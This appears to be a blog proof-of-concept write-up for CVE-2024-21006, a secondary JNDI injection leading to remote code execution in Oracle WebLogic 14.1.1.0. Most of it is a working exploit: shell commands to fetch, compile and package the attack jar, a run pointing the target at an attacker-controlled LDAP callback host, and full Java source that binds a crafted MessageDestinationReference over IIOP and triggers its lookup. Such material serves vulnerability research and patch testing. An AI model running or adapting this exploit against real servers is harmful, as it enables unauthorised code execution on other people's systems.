WebLogic — CVE-2024-21006

CVE-2024-21006 reveals a new WebLogic attack method: secondary JNDI injection, that is, triggering JNDI injection during the JNDI injection process, thereby completing RCE.

Project is based on the findings of pwnull and code from momika223.

Proof-of-Concept

Oracle 14.1.1.0

N/ABASH
apt :: ~ » docker container ls
CONTAINER ID   IMAGE                                                        COMMAND                  CREATED        STATUS       PORTS                                                                                  NAMES
fa9822b7dfd5   container-registry.oracle.com/middleware/weblogic:14.1.1.0   "/u01/oracle/createA…"   23 hours ago   Up 2 hours   0.0.0.0:7001->7001/tcp, :::7001->7001/tcp, 0.0.0.0:9002->9002/tcp, :::9002->9002/tcp   14110-weblogic

Prepare the environment by uploading MainClass.java and META-INF/MANIFEST.MF to the WebLogic container.

N/ABASH
[oracle@14110-weblogic lib]$ curl -OL 172.17.0.1/MainClass.java
[oracle@14110-weblogic lib]$ curl -OL 172.17.0.1/MANIFEST.MF
[oracle@14110-weblogic lib]$ mkdir META-INF
[oracle@14110-weblogic lib]$ mv MANIFEST.MF META-INF/

Compile the code.

N/ABASH
[oracle@14110-weblogic lib]$ javac -cp /u01/oracle/wlserver/server/lib/weblogic.jar MainClass.java
[oracle@14110-weblogic lib]$ ls -al | grep MainClass
-rw-rw-r-- 1 oracle oracle    2033 Oct 10 08:03 MainClass$1.class
-rw-rw-r-- 1 oracle oracle    1386 Oct 10 08:03 MainClass.class
-rw-rw-r-- 1 oracle oracle    3717 Oct 10 08:01 MainClass.java
 
[oracle@14110-weblogic lib]$ jar cvfm cve-2024-21006.jar META-INF/MANIFEST.MF *.class
added manifest
adding: MainClass$1.class(in = 2033) (out= 671)(deflated 66%)
adding: MainClass.class(in = 2161) (out= 1100)(deflated 49%)
N/ABASH
[oracle@14110-weblogic lib]$ java -jar cve-2024-21006.jar
Target IP: 127.0.0.1
Target Port: 7001
RMI Address (ip:port/exp): wssm1qvzn5i56ehqjskcwdmtckib639ry.oastify.com

Source code

MainClass.java

N/AJAVA
import weblogic.j2ee.descriptor.InjectionTargetBean;
import weblogic.j2ee.descriptor.MessageDestinationRefBean;
import javax.naming.*;
import java.util.Scanner;
import java.util.Hashtable;
import java.util.Random;
 
public class MainClass {
 
    public static void main(String[] args) throws Exception {
	Scanner scanner = new Scanner(System.in);
	System.out.print("Target IP: ");
	String ip = scanner.nextLine();
	System.out.print("Target Port: ");
	String port = scanner.nextLine();
	System.out.print("RMI Address (ip:port/exp): ");
	String rmiexp = scanner.nextLine();
	Random bindname = new Random();
	int bindint = bindname.nextInt(10000);
        String rhost = String.format("iiop://%s:%s", ip, port);
        Hashtable<String, String> env = new Hashtable<String, String>();
        env.put("java.naming.factory.initial", "weblogic.jndi.WLInitialContextFactory");
        env.put(Context.PROVIDER_URL, rhost);
        Context context = new InitialContext(env);
        weblogic.application.naming.MessageDestinationReference messageDestinationReference=new weblogic.application.naming.MessageDestinationReference(null, new MessageDestinationRefBean() {
            @Override
            public String[] getDescriptions() {
                return new String[0];
            }
 
            @Override
            public void addDescription(String s) {
 
            }
 
            @Override
            public void removeDescription(String s) {
 
            }
 
            @Override
            public void setDescriptions(String[] strings) {
 
            }
 
            @Override
            public String getMessageDestinationRefName() {
                return null;
            }
 
            @Override
            public void setMessageDestinationRefName(String s) {
 
            }
 
            @Override
            public String getMessageDestinationType() {
                return "weblogic.application.naming.MessageDestinationReference";
            }
 
            @Override
            public void setMessageDestinationType(String s) {
 
            }
 
            @Override
            public String getMessageDestinationUsage() {
                return null;
            }
 
            @Override
            public void setMessageDestinationUsage(String s) {
 
            }
 
            @Override
            public String getMessageDestinationLink() {
                return null;
            }
 
            @Override
            public void setMessageDestinationLink(String s) {
 
            }
 
            @Override
            public String getMappedName() {
                return null;
            }
 
            @Override
            public void setMappedName(String s) {
 
            }
 
            @Override
            public InjectionTargetBean[] getInjectionTargets() {
                return new InjectionTargetBean[0];
            }
 
            @Override
            public InjectionTargetBean createInjectionTarget() {
                return null;
            }
 
            @Override
            public void destroyInjectionTarget(InjectionTargetBean injectionTargetBean) {
 
            }
 
            @Override
            public String getLookupName() {
                return null;
            }
 
            @Override
            public void setLookupName(String s) {
 
            }
 
            @Override
            public String getId() {
                return null;
            }
 
            @Override
            public void setId(String s) {
 
            }
        }, "ldap://" + rmiexp, null, null);
 
        context.bind("pthree"+bindint,messageDestinationReference);
        context.lookup("pthree"+bindint);
    }
}

META-INF/MANIFEST.MF

N/A
Manifest-Version: 1.0
Main-Class: MainClass
Class-Path: /u01/oracle/wlserver/server/lib/weblogic.jar
Disclaimer

All content published on exploit.se is intended strictly for educational and informational purposes. Research is conducted responsibly under coordinated disclosure principles.

Techniques, tools, and writeups shared on this site are meant to advance the security community's understanding of vulnerabilities and defences. They are not intended to encourage or enable unauthorised access to any system.

The author bears no responsibility for any misuse of information presented here.

Cookie Settings

This site does not use cookies, analytics, or any third-party tracking technologies.

No personal data is collected. No fingerprinting. No ads. You are not the product.


 ██╗ ██████╗ ███████╗██╗███████╗███╗   ██╗██████╗
 ██║██╔═══██╗██╔════╝██║██╔════╝████╗  ██║██╔══██╗
 ██║██║   ██║█████╗  ██║█████╗  ██╔██╗ ██║██║  ██║
 ██║██║   ██║██╔══╝  ██║██╔══╝  ██║╚██╗██║██║  ██║
 ██║╚██████╔╝██║     ██║███████╗██║ ╚████║██████╔╝
 ╚═╝ ╚═════╝ ╚═╝     ╚═╝╚══════╝╚═╝  ╚═══╝╚═════╝
You found me.
↑↑↓↓←→←→ B A  ·  click to close